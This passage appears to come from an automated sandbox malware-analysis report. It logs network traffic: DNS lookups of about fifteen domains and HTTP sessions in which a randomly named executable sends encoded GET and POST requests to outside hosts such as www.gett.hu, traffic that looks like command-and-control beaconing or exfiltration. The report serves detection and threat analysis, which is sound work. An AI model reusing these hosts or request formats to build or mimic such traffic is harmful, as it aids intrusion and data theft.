                                  May 27, 2024 12:37:15.391165018 CEST4976180192.168.2.7216.40.34.41
                                  May 27, 2024 12:37:15.391177893 CEST8049761216.40.34.41192.168.2.7
                                  May 27, 2024 12:37:15.391192913 CEST8049761216.40.34.41192.168.2.7
                                  May 27, 2024 12:37:15.391206026 CEST8049761216.40.34.41192.168.2.7
                                  May 27, 2024 12:37:15.391215086 CEST4976180192.168.2.7216.40.34.41
                                  May 27, 2024 12:37:15.391217947 CEST8049761216.40.34.41192.168.2.7
                                  May 27, 2024 12:37:15.391232967 CEST8049761216.40.34.41192.168.2.7
                                  May 27, 2024 12:37:15.391244888 CEST8049761216.40.34.41192.168.2.7
                                  May 27, 2024 12:37:15.391258001 CEST4976180192.168.2.7216.40.34.41
                                  May 27, 2024 12:37:15.391277075 CEST4976180192.168.2.7216.40.34.41
                                  May 27, 2024 12:37:15.396152020 CEST8049761216.40.34.41192.168.2.7
                                  May 27, 2024 12:37:15.407969952 CEST8049761216.40.34.41192.168.2.7
                                  May 27, 2024 12:37:15.407991886 CEST8049761216.40.34.41192.168.2.7
                                  May 27, 2024 12:37:15.408016920 CEST4976180192.168.2.7216.40.34.41
                                  May 27, 2024 12:37:15.479727983 CEST8049761216.40.34.41192.168.2.7
                                  May 27, 2024 12:37:15.479743958 CEST8049761216.40.34.41192.168.2.7
                                  May 27, 2024 12:37:15.479757071 CEST8049761216.40.34.41192.168.2.7
                                  May 27, 2024 12:37:15.479768038 CEST8049761216.40.34.41192.168.2.7
                                  May 27, 2024 12:37:15.479887009 CEST4976180192.168.2.7216.40.34.41
                                  May 27, 2024 12:37:15.479887009 CEST4976180192.168.2.7216.40.34.41
                                  May 27, 2024 12:37:15.479934931 CEST8049761216.40.34.41192.168.2.7
                                  May 27, 2024 12:37:15.479998112 CEST4976180192.168.2.7216.40.34.41
                                  May 27, 2024 12:37:16.356610060 CEST4976180192.168.2.7216.40.34.41
                                  May 27, 2024 12:37:17.374814987 CEST4976280192.168.2.7216.40.34.41
                                  May 27, 2024 12:37:17.379633904 CEST8049762216.40.34.41192.168.2.7
                                  May 27, 2024 12:37:17.379723072 CEST4976280192.168.2.7216.40.34.41
                                  May 27, 2024 12:37:17.382560968 CEST4976280192.168.2.7216.40.34.41
                                  May 27, 2024 12:37:17.387547970 CEST8049762216.40.34.41192.168.2.7
                                  May 27, 2024 12:37:17.387650013 CEST8049762216.40.34.41192.168.2.7
                                  May 27, 2024 12:37:17.893853903 CEST8049762216.40.34.41192.168.2.7
                                  May 27, 2024 12:37:17.893867016 CEST8049762216.40.34.41192.168.2.7
                                  May 27, 2024 12:37:17.893887997 CEST8049762216.40.34.41192.168.2.7
                                  May 27, 2024 12:37:17.893901110 CEST8049762216.40.34.41192.168.2.7
                                  May 27, 2024 12:37:17.893918037 CEST8049762216.40.34.41192.168.2.7
                                  May 27, 2024 12:37:17.893927097 CEST8049762216.40.34.41192.168.2.7
                                  May 27, 2024 12:37:17.893945932 CEST8049762216.40.34.41192.168.2.7
                                  May 27, 2024 12:37:17.893954992 CEST4976280192.168.2.7216.40.34.41
                                  May 27, 2024 12:37:17.893964052 CEST8049762216.40.34.41192.168.2.7
                                  May 27, 2024 12:37:17.893978119 CEST8049762216.40.34.41192.168.2.7
                                  May 27, 2024 12:37:17.893995047 CEST8049762216.40.34.41192.168.2.7
                                  May 27, 2024 12:37:17.894007921 CEST4976280192.168.2.7216.40.34.41
                                  May 27, 2024 12:37:17.894046068 CEST4976280192.168.2.7216.40.34.41
                                  May 27, 2024 12:37:17.899312973 CEST8049762216.40.34.41192.168.2.7
                                  May 27, 2024 12:37:17.901091099 CEST8049762216.40.34.41192.168.2.7
                                  May 27, 2024 12:37:17.901101112 CEST8049762216.40.34.41192.168.2.7
                                  May 27, 2024 12:37:17.901252031 CEST4976280192.168.2.7216.40.34.41
                                  May 27, 2024 12:37:17.980779886 CEST8049762216.40.34.41192.168.2.7
                                  May 27, 2024 12:37:17.980792046 CEST8049762216.40.34.41192.168.2.7
                                  May 27, 2024 12:37:17.980838060 CEST8049762216.40.34.41192.168.2.7
                                  May 27, 2024 12:37:17.980889082 CEST8049762216.40.34.41192.168.2.7
                                  May 27, 2024 12:37:17.980895996 CEST4976280192.168.2.7216.40.34.41
                                  May 27, 2024 12:37:17.980925083 CEST8049762216.40.34.41192.168.2.7
                                  May 27, 2024 12:37:17.980946064 CEST4976280192.168.2.7216.40.34.41
                                  May 27, 2024 12:37:17.980963945 CEST4976280192.168.2.7216.40.34.41
                                  May 27, 2024 12:37:17.981297970 CEST8049762216.40.34.41192.168.2.7
                                  May 27, 2024 12:37:17.981353998 CEST4976280192.168.2.7216.40.34.41
                                  May 27, 2024 12:37:20.222023010 CEST4976280192.168.2.7216.40.34.41
                                  May 27, 2024 12:37:21.234376907 CEST4976380192.168.2.7216.40.34.41
                                  May 27, 2024 12:37:21.239306927 CEST8049763216.40.34.41192.168.2.7
                                  May 27, 2024 12:37:21.239420891 CEST4976380192.168.2.7216.40.34.41
                                  May 27, 2024 12:37:21.241363049 CEST4976380192.168.2.7216.40.34.41
                                  May 27, 2024 12:37:21.246345043 CEST8049763216.40.34.41192.168.2.7
                                  May 27, 2024 12:37:21.735172033 CEST8049763216.40.34.41192.168.2.7
                                  May 27, 2024 12:37:21.735198975 CEST8049763216.40.34.41192.168.2.7
                                  May 27, 2024 12:37:21.735208988 CEST8049763216.40.34.41192.168.2.7
                                  May 27, 2024 12:37:21.735266924 CEST8049763216.40.34.41192.168.2.7
                                  May 27, 2024 12:37:21.735285044 CEST8049763216.40.34.41192.168.2.7
                                  May 27, 2024 12:37:21.735296965 CEST8049763216.40.34.41192.168.2.7
                                  May 27, 2024 12:37:21.735306978 CEST8049763216.40.34.41192.168.2.7
                                  May 27, 2024 12:37:21.735357046 CEST4976380192.168.2.7216.40.34.41
                                  May 27, 2024 12:37:21.735403061 CEST4976380192.168.2.7216.40.34.41
                                  May 27, 2024 12:37:21.735411882 CEST8049763216.40.34.41192.168.2.7
                                  May 27, 2024 12:37:21.735459089 CEST4976380192.168.2.7216.40.34.41
                                  May 27, 2024 12:37:21.739662886 CEST4976380192.168.2.7216.40.34.41
                                  May 27, 2024 12:37:21.744611025 CEST8049763216.40.34.41192.168.2.7
                                  May 27, 2024 12:37:27.275835037 CEST4976480192.168.2.7152.32.189.143
                                  May 27, 2024 12:37:27.280755043 CEST8049764152.32.189.143192.168.2.7
                                  May 27, 2024 12:37:27.281044960 CEST4976480192.168.2.7152.32.189.143
                                  May 27, 2024 12:37:27.283700943 CEST4976480192.168.2.7152.32.189.143
                                  May 27, 2024 12:37:27.288600922 CEST8049764152.32.189.143192.168.2.7
                                  May 27, 2024 12:37:28.150044918 CEST8049764152.32.189.143192.168.2.7
                                  May 27, 2024 12:37:28.150319099 CEST8049764152.32.189.143192.168.2.7
                                  May 27, 2024 12:37:28.150460005 CEST4976480192.168.2.7152.32.189.143
                                  May 27, 2024 12:37:28.794341087 CEST4976480192.168.2.7152.32.189.143
                                  May 27, 2024 12:37:29.815866947 CEST4976580192.168.2.7152.32.189.143
                                  May 27, 2024 12:37:29.820812941 CEST8049765152.32.189.143192.168.2.7
                                  May 27, 2024 12:37:29.820947886 CEST4976580192.168.2.7152.32.189.143
                                  May 27, 2024 12:37:29.823894978 CEST4976580192.168.2.7152.32.189.143
                                  May 27, 2024 12:37:29.829078913 CEST8049765152.32.189.143192.168.2.7
                                  May 27, 2024 12:37:30.691446066 CEST8049765152.32.189.143192.168.2.7
                                  May 27, 2024 12:37:30.691622019 CEST8049765152.32.189.143192.168.2.7
                                  May 27, 2024 12:37:30.691696882 CEST4976580192.168.2.7152.32.189.143
                                  May 27, 2024 12:37:31.325166941 CEST4976580192.168.2.7152.32.189.143
                                  May 27, 2024 12:37:32.344743013 CEST4976680192.168.2.7152.32.189.143
                                  May 27, 2024 12:37:32.349770069 CEST8049766152.32.189.143192.168.2.7
                                  May 27, 2024 12:37:32.349853992 CEST4976680192.168.2.7152.32.189.143
                                  May 27, 2024 12:37:32.352309942 CEST4976680192.168.2.7152.32.189.143
                                  May 27, 2024 12:37:32.357275963 CEST8049766152.32.189.143192.168.2.7
                                  May 27, 2024 12:37:32.357361078 CEST8049766152.32.189.143192.168.2.7
                                  May 27, 2024 12:37:33.251585960 CEST8049766152.32.189.143192.168.2.7
                                  May 27, 2024 12:37:33.251842976 CEST8049766152.32.189.143192.168.2.7
                                  May 27, 2024 12:37:33.256792068 CEST4976680192.168.2.7152.32.189.143
                                  May 27, 2024 12:37:34.684489012 CEST4976680192.168.2.7152.32.189.143
                                  May 27, 2024 12:37:35.703176022 CEST4976780192.168.2.7152.32.189.143
                                  May 27, 2024 12:37:35.708472013 CEST8049767152.32.189.143192.168.2.7
                                  May 27, 2024 12:37:35.709691048 CEST4976780192.168.2.7152.32.189.143
                                  May 27, 2024 12:37:35.713799953 CEST4976780192.168.2.7152.32.189.143
                                  May 27, 2024 12:37:35.719624996 CEST8049767152.32.189.143192.168.2.7
                                  May 27, 2024 12:37:36.612344980 CEST8049767152.32.189.143192.168.2.7
                                  May 27, 2024 12:37:36.612442017 CEST8049767152.32.189.143192.168.2.7
                                  May 27, 2024 12:37:36.612624884 CEST4976780192.168.2.7152.32.189.143
                                  May 27, 2024 12:37:36.615174055 CEST4976780192.168.2.7152.32.189.143
                                  May 27, 2024 12:37:36.619992971 CEST8049767152.32.189.143192.168.2.7

                                  UDP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  May 27, 2024 12:34:06.390666008 CEST4935753192.168.2.71.1.1.1
                                  May 27, 2024 12:34:06.749609947 CEST53493571.1.1.1192.168.2.7
                                  May 27, 2024 12:34:23.962462902 CEST6217753192.168.2.71.1.1.1
                                  May 27, 2024 12:34:24.046802998 CEST53621771.1.1.1192.168.2.7
                                  May 27, 2024 12:34:37.316772938 CEST6367153192.168.2.71.1.1.1
                                  May 27, 2024 12:34:37.407128096 CEST53636711.1.1.1192.168.2.7
                                  May 27, 2024 12:34:50.812757969 CEST5015153192.168.2.71.1.1.1
                                  May 27, 2024 12:34:50.826881886 CEST53501511.1.1.1192.168.2.7
                                  May 27, 2024 12:35:05.484013081 CEST5127253192.168.2.71.1.1.1
                                  May 27, 2024 12:35:05.498781919 CEST53512721.1.1.1192.168.2.7
                                  May 27, 2024 12:35:19.047758102 CEST5556753192.168.2.71.1.1.1
                                  May 27, 2024 12:35:19.245074987 CEST53555671.1.1.1192.168.2.7
                                  May 27, 2024 12:35:32.343859911 CEST6542853192.168.2.71.1.1.1
                                  May 27, 2024 12:35:32.471004963 CEST53654281.1.1.1192.168.2.7
                                  May 27, 2024 12:35:45.656924963 CEST6281653192.168.2.71.1.1.1
                                  May 27, 2024 12:35:45.718807936 CEST53628161.1.1.1192.168.2.7
                                  May 27, 2024 12:35:59.844746113 CEST5774753192.168.2.71.1.1.1
                                  May 27, 2024 12:36:00.147327900 CEST53577471.1.1.1192.168.2.7
                                  May 27, 2024 12:36:13.710664988 CEST6047553192.168.2.71.1.1.1
                                  May 27, 2024 12:36:14.700414896 CEST6047553192.168.2.71.1.1.1
                                  May 27, 2024 12:36:14.796113968 CEST53604751.1.1.1192.168.2.7
                                  May 27, 2024 12:36:14.796387911 CEST53604751.1.1.1192.168.2.7
                                  May 27, 2024 12:36:28.047086000 CEST6231853192.168.2.71.1.1.1
                                  May 27, 2024 12:36:28.262643099 CEST53623181.1.1.1192.168.2.7
                                  May 27, 2024 12:36:41.627422094 CEST5297253192.168.2.71.1.1.1
                                  May 27, 2024 12:36:42.424490929 CEST53529721.1.1.1192.168.2.7
                                  May 27, 2024 12:36:57.031725883 CEST5898853192.168.2.71.1.1.1
                                  May 27, 2024 12:36:57.139758110 CEST53589881.1.1.1192.168.2.7
                                  May 27, 2024 12:37:12.016524076 CEST6516653192.168.2.71.1.1.1
                                  May 27, 2024 12:37:12.298794031 CEST53651661.1.1.1192.168.2.7
                                  May 27, 2024 12:37:26.751667023 CEST4981353192.168.2.71.1.1.1
                                  May 27, 2024 12:37:27.271588087 CEST53498131.1.1.1192.168.2.7

                                  DNS Queries

                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                  May 27, 2024 12:34:06.390666008 CEST192.168.2.71.1.1.10x8b6Standard query (0)www.crxwdix.storeA (IP address)IN (0x0001)false
                                  May 27, 2024 12:34:23.962462902 CEST192.168.2.71.1.1.10xe5a1Standard query (0)www.gett.huA (IP address)IN (0x0001)false
                                  May 27, 2024 12:34:37.316772938 CEST192.168.2.71.1.1.10xe1feStandard query (0)www.lets-goo.ruA (IP address)IN (0x0001)false
                                  May 27, 2024 12:34:50.812757969 CEST192.168.2.71.1.1.10xe154Standard query (0)www.emgeecontracting.shopA (IP address)IN (0x0001)false
                                  May 27, 2024 12:35:05.484013081 CEST192.168.2.71.1.1.10x9114Standard query (0)www.duobao698.comA (IP address)IN (0x0001)false
                                  May 27, 2024 12:35:19.047758102 CEST192.168.2.71.1.1.10xf682Standard query (0)www.drdavidglassman.comA (IP address)IN (0x0001)false
                                  May 27, 2024 12:35:32.343859911 CEST192.168.2.71.1.1.10xb57aStandard query (0)www.friendsfavorites.petA (IP address)IN (0x0001)false
                                  May 27, 2024 12:35:45.656924963 CEST192.168.2.71.1.1.10x4888Standard query (0)www.featuringnature.deA (IP address)IN (0x0001)false
                                  May 27, 2024 12:35:59.844746113 CEST192.168.2.71.1.1.10xbcf3Standard query (0)www.kohfour.comA (IP address)IN (0x0001)false
                                  May 27, 2024 12:36:13.710664988 CEST192.168.2.71.1.1.10x3e0bStandard query (0)www.getmall.onlineA (IP address)IN (0x0001)false
                                  May 27, 2024 12:36:14.700414896 CEST192.168.2.71.1.1.10x3e0bStandard query (0)www.getmall.onlineA (IP address)IN (0x0001)false
                                  May 27, 2024 12:36:28.047086000 CEST192.168.2.71.1.1.10xb776Standard query (0)www.uqdr.cnA (IP address)IN (0x0001)false
                                  May 27, 2024 12:36:41.627422094 CEST192.168.2.71.1.1.10xb674Standard query (0)www.kernelphysics.comA (IP address)IN (0x0001)false
                                  May 27, 2024 12:36:57.031725883 CEST192.168.2.71.1.1.10x9857Standard query (0)www.theppelin.onlineA (IP address)IN (0x0001)false
                                  May 27, 2024 12:37:12.016524076 CEST192.168.2.71.1.1.10x2108Standard query (0)www.botcsllc.comA (IP address)IN (0x0001)false
                                  May 27, 2024 12:37:26.751667023 CEST192.168.2.71.1.1.10xd4c6Standard query (0)www.shengniu.comA (IP address)IN (0x0001)false

                                  DNS Answers

                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                  May 27, 2024 12:34:06.749609947 CEST1.1.1.1192.168.2.70x8b6No error (0)www.crxwdix.store124.156.151.111A (IP address)IN (0x0001)false
                                  May 27, 2024 12:34:24.046802998 CEST1.1.1.1192.168.2.70xe5a1No error (0)www.gett.hugett.huCNAME (Canonical name)IN (0x0001)false
                                  May 27, 2024 12:34:24.046802998 CEST1.1.1.1192.168.2.70xe5a1No error (0)gett.hu193.201.190.93A (IP address)IN (0x0001)false
                                  May 27, 2024 12:34:37.407128096 CEST1.1.1.1192.168.2.70xe1feNo error (0)www.lets-goo.ru104.21.81.245A (IP address)IN (0x0001)false
                                  May 27, 2024 12:34:37.407128096 CEST1.1.1.1192.168.2.70xe1feNo error (0)www.lets-goo.ru172.67.192.34A (IP address)IN (0x0001)false
                                  May 27, 2024 12:34:50.826881886 CEST1.1.1.1192.168.2.70xe154No error (0)www.emgeecontracting.shopemgeecontracting.shopCNAME (Canonical name)IN (0x0001)false
                                  May 27, 2024 12:34:50.826881886 CEST1.1.1.1192.168.2.70xe154No error (0)emgeecontracting.shop69.57.162.24A (IP address)IN (0x0001)false
                                  May 27, 2024 12:35:05.498781919 CEST1.1.1.1192.168.2.70x9114No error (0)www.duobao698.comduobao698.comCNAME (Canonical name)IN (0x0001)false
                                  May 27, 2024 12:35:05.498781919 CEST1.1.1.1192.168.2.70x9114No error (0)duobao698.com3.33.130.190A (IP address)IN (0x0001)false
                                  May 27, 2024 12:35:05.498781919 CEST1.1.1.1192.168.2.70x9114No error (0)duobao698.com15.197.148.33A (IP address)IN (0x0001)false
                                  May 27, 2024 12:35:19.245074987 CEST1.1.1.1192.168.2.70xf682No error (0)www.drdavidglassman.com199.59.243.225A (IP address)IN (0x0001)false
                                  May 27, 2024 12:35:32.471004963 CEST1.1.1.1192.168.2.70xb57aNo error (0)www.friendsfavorites.pet94950.bodis.comCNAME (Canonical name)IN (0x0001)false
                                  May 27, 2024 12:35:32.471004963 CEST1.1.1.1192.168.2.70xb57aNo error (0)94950.bodis.com199.59.243.225A (IP address)IN (0x0001)false
                                  May 27, 2024 12:35:45.718807936 CEST1.1.1.1192.168.2.70x4888No error (0)www.featuringnature.defeaturingnature.deCNAME (Canonical name)IN (0x0001)false
                                  May 27, 2024 12:35:45.718807936 CEST1.1.1.1192.168.2.70x4888No error (0)featuringnature.de3.33.130.190A (IP address)IN (0x0001)false
                                  May 27, 2024 12:35:45.718807936 CEST1.1.1.1192.168.2.70x4888No error (0)featuringnature.de15.197.148.33A (IP address)IN (0x0001)false
                                  May 27, 2024 12:36:00.147327900 CEST1.1.1.1192.168.2.70xbcf3No error (0)www.kohfour.com216.40.34.41A (IP address)IN (0x0001)false
                                  May 27, 2024 12:36:14.796113968 CEST1.1.1.1192.168.2.70x3e0bNo error (0)www.getmall.online203.161.43.228A (IP address)IN (0x0001)false
                                  May 27, 2024 12:36:14.796387911 CEST1.1.1.1192.168.2.70x3e0bNo error (0)www.getmall.online203.161.43.228A (IP address)IN (0x0001)false
                                  May 27, 2024 12:36:28.262643099 CEST1.1.1.1192.168.2.70xb776No error (0)www.uqdr.cn188.114.96.3A (IP address)IN (0x0001)false
                                  May 27, 2024 12:36:28.262643099 CEST1.1.1.1192.168.2.70xb776No error (0)www.uqdr.cn188.114.97.3A (IP address)IN (0x0001)false
                                  May 27, 2024 12:36:42.424490929 CEST1.1.1.1192.168.2.70xb674No error (0)www.kernelphysics.com45.64.187.212A (IP address)IN (0x0001)false
                                  May 27, 2024 12:36:57.139758110 CEST1.1.1.1192.168.2.70x9857No error (0)www.theppelin.online194.58.112.174A (IP address)IN (0x0001)false
                                  May 27, 2024 12:37:12.298794031 CEST1.1.1.1192.168.2.70x2108No error (0)www.botcsllc.com216.40.34.41A (IP address)IN (0x0001)false
                                  May 27, 2024 12:37:27.271588087 CEST1.1.1.1192.168.2.70xd4c6No error (0)www.shengniu.com152.32.189.143A (IP address)IN (0x0001)false

                                  HTTP Request Dependency Graph

                                  • www.crxwdix.store
                                  • www.gett.hu
                                  • www.lets-goo.ru
                                  • www.emgeecontracting.shop
                                  • www.duobao698.com
                                  • www.drdavidglassman.com
                                  • www.friendsfavorites.pet
                                  • www.featuringnature.de
                                  • www.kohfour.com
                                  • www.getmall.online
                                  • www.uqdr.cn
                                  • www.kernelphysics.com
                                  • www.theppelin.online
                                  • www.botcsllc.com
                                  • www.shengniu.com

                                  HTTP Packets

                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.2.749710124.156.151.111806704C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  TimestampBytes transferredDirectionData
                                  May 27, 2024 12:34:06.769299030 CEST488OUTGET /y4a0/?4h=SNHD3K3PParXHnkwUXmJyoZGSKzPVxiMFdor0NFDe3qARdFDsr6bi2Hm1bNI3aFCJ45VE8SHGaBHgDSe2Sonpz6bDHAjQ/z+aswAPE+xiOEsS724wCH7dMecgb+s+6E26U1cI5uvI0Mp&623=YLI8v8eXd0Y HTTP/1.1
                                  Host: www.crxwdix.store
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Connection: close
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  May 27, 2024 12:34:07.946592093 CEST348INHTTP/1.1 404 Not Found
                                  Server: nginx
                                  Date: Mon, 27 May 2024 10:34:07 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Vary: Accept-Encoding
                                  Access-Control-Allow-Origin: *
                                  Access-Control-Allow-Methods: *
                                  Access-Control-Allow-Headers: Content-Type,Access-Token,Appid,Secret,Authorization,Token
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  1192.168.2.749711193.201.190.93806704C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  TimestampBytes transferredDirectionData
                                  May 27, 2024 12:34:24.060775042 CEST733OUTPOST /1df8/ HTTP/1.1
                                  Host: www.gett.hu
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Accept-Encoding: gzip, deflate, br
                                  Origin: http://www.gett.hu
                                  Connection: close
                                  Content-Length: 215
                                  Content-Type: application/x-www-form-urlencoded
                                  Cache-Control: max-age=0
                                  Referer: http://www.gett.hu/1df8/
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  Data Raw: 34 68 3d 4b 49 62 31 58 63 7a 32 62 30 61 71 74 59 47 77 53 62 49 55 75 43 67 58 48 72 7a 44 73 38 69 45 37 42 76 6b 5a 4d 70 41 50 65 62 63 57 4b 61 4d 58 62 37 35 6c 4c 57 67 2b 39 4f 44 73 74 63 32 42 32 4a 6a 78 46 4b 6c 77 53 6f 49 4a 76 51 6c 52 35 33 36 77 45 64 52 4d 49 71 59 63 65 49 30 32 56 35 73 30 75 46 66 47 77 2b 51 79 59 6f 55 43 2f 74 6f 79 76 42 32 38 64 50 36 58 31 65 6e 74 73 7a 56 73 37 4d 4e 6f 63 64 65 74 6a 4f 57 7a 59 63 5a 7a 63 4b 4f 31 4a 55 67 69 46 36 62 6b 53 4b 42 59 75 57 4d 30 49 2f 54 53 52 38 59 42 6c 67 5a 73 4c 7a 72 5a 56 72 5a 6d 68 65 57 79 77 74 45 36 78 43 34 31 73 6c 33 38 6c 34 37 2b 77 3d 3d
                                  Data Ascii: 4h=KIb1Xcz2b0aqtYGwSbIUuCgXHrzDs8iE7BvkZMpAPebcWKaMXb75lLWg+9ODstc2B2JjxFKlwSoIJvQlR536wEdRMIqYceI02V5s0uFfGw+QyYoUC/toyvB28dP6X1entszVs7MNocdetjOWzYcZzcKO1JUgiF6bkSKBYuWM0I/TSR8YBlgZsLzrZVrZmheWywtE6xC41sl38l47+w==
                                  May 27, 2024 12:34:24.880057096 CEST479INHTTP/1.1 404 Not Found
                                  Date: Mon, 27 May 2024 10:34:24 GMT
                                  Server: Apache
                                  Content-Length: 315
                                  Connection: close
                                  Content-Type: text/html; charset=iso-8859-1
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  2192.168.2.749712193.201.190.93806704C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  TimestampBytes transferredDirectionData
                                  May 27, 2024 12:34:26.600580931 CEST753OUTPOST /1df8/ HTTP/1.1
                                  Host: www.gett.hu
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Accept-Encoding: gzip, deflate, br
                                  Origin: http://www.gett.hu
                                  Connection: close
                                  Content-Length: 235
                                  Content-Type: application/x-www-form-urlencoded
                                  Cache-Control: max-age=0
                                  Referer: http://www.gett.hu/1df8/
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  Data Raw: 34 68 3d 4b 49 62 31 58 63 7a 32 62 30 61 71 74 34 57 77 51 34 51 55 6d 43 67 57 4c 4c 7a 44 37 73 69 41 37 42 6a 6b 5a 4e 74 71 50 73 76 63 54 65 53 4d 55 65 50 35 6d 4c 57 67 77 64 4f 43 6f 74 63 39 42 33 31 56 78 48 75 6c 77 55 45 49 4a 72 55 6c 52 4f 62 35 78 55 63 33 5a 59 71 47 54 2b 49 30 32 56 35 73 30 75 68 31 47 77 6d 51 79 6f 59 55 41 64 46 72 38 50 42 31 37 64 50 36 64 56 66 75 74 73 79 41 73 36 51 6e 6f 61 52 65 74 6d 79 57 7a 4e 6f 61 6d 4d 4b 41 71 35 56 4a 6a 33 4b 58 74 53 69 61 55 4d 57 53 2b 2f 50 4f 61 48 68 36 62 48 73 31 79 61 4c 51 64 58 50 76 78 48 44 6a 77 78 70 63 33 54 32 5a 71 62 41 64 78 33 5a 2f 6f 4e 33 50 53 50 4a 37 51 63 2f 64 34 30 2b 76 4e 44 54 39 67 31 73 3d
                                  Data Ascii: 4h=KIb1Xcz2b0aqt4WwQ4QUmCgWLLzD7siA7BjkZNtqPsvcTeSMUeP5mLWgwdOCotc9B31VxHulwUEIJrUlROb5xUc3ZYqGT+I02V5s0uh1GwmQyoYUAdFr8PB17dP6dVfutsyAs6QnoaRetmyWzNoamMKAq5VJj3KXtSiaUMWS+/POaHh6bHs1yaLQdXPvxHDjwxpc3T2ZqbAdx3Z/oN3PSPJ7Qc/d40+vNDT9g1s=
                                  May 27, 2024 12:34:27.248662949 CEST479INHTTP/1.1 404 Not Found
                                  Date: Mon, 27 May 2024 10:34:27 GMT
                                  Server: Apache
                                  Content-Length: 315
                                  Connection: close
                                  Content-Type: text/html; charset=iso-8859-1
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
